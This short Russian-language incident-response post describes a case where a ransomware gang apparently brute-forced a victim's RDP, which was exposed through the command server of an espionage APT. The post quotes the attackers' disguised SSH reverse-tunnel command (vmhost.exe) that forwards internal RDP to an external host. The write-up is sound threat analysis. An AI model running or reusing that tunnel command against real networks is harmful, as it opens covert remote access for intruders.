Но на практике всё бывает не так однозначно. Вот пример из наших недавних расследований. На одной из машин пострадавшей организации всплывают:
– бэкдоры алледжидли-азиатской APT,
– запуск SSH-туннелей, форвардящих порт RDP; в одном случае сервер управления пересекается с сервером управления алледжидли-азиатского бэкдора,
– инструменты для извлечения паролей,
– явление шифровальщика, а его операторы подключаются через SSH-туннель:
vmhost.exe -C -N -R 443:<internal_ip>:3389 root@<external_ip> -P 80 -pw <password> -v
Однако алледжидли-азиатская APT, которой принадлежат бэкдоры, никогда не занималась вымогательством. Они просто шпионили за своей целью в течение последних 4 лет. Необычная сюжетная арка.
Мы пробили, какие сервисы доступны из публичных сетей на сервере управления той самой APT-группы. Там торчал наружу RDP пострадавших. А вот брутфорс-атака на RDP – это уже характерное поведение для операторов шифровальщика, с которым мы столкнулись. То есть вторая группа атакующих (вымогатели) насканили RDP-порт жертвы на инфре первоначальных атакующих (алледжидли-азиатская APT) и сбрутили его.
Мораль: Не выкидывай RDP в публичные сети, даже если ты – шпиён 😊